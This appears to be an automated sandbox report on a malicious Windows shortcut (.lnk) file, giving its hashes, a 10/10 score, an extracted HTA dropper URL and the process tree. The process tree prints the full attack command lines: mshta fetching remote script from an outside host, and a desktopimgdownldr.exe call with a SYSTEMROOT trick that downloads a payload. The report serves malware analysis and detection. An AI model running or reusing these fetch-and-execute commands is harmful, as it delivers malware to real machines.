Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 04:23
Static task
static1
Behavioral task
behavioral1
Sample
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk
Resource
win7-20241010-en
windows7-x64
3 signatures
150 seconds
General
-
Target
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk
-
Size
1KB
-
MD5
95bfcc2eac48c76681aa2d97a5674201
-
SHA1
f72d50b2bba6e479ec106ae2f6fe993ab6eef99a
-
SHA256
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478
-
SHA512
952485dbd0096257ab62ef2fa684d1333fa1e495ad29d8e7a8aaa41d6b316abb48ca5ad2c1b704db7e5bc346a8350039a059c7d5ad323b072ecd3911ac4c5925
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://0day.works/a
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 5 2804 mshta.exe 7 2804 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exemshta.exedescription pid Process procid_target PID 2784 wrote to memory of 2804 2784 cmd.exe 31 PID 2784 wrote to memory of 2804 2784 cmd.exe 31 PID 2784 wrote to memory of 2804 2784 cmd.exe 31 PID 2804 wrote to memory of 2332 2804 mshta.exe 32 PID 2804 wrote to memory of 2332 2804 mshta.exe 32 PID 2804 wrote to memory of 2332 2804 mshta.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://0day.works/a2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr3⤵PID:2332
-
-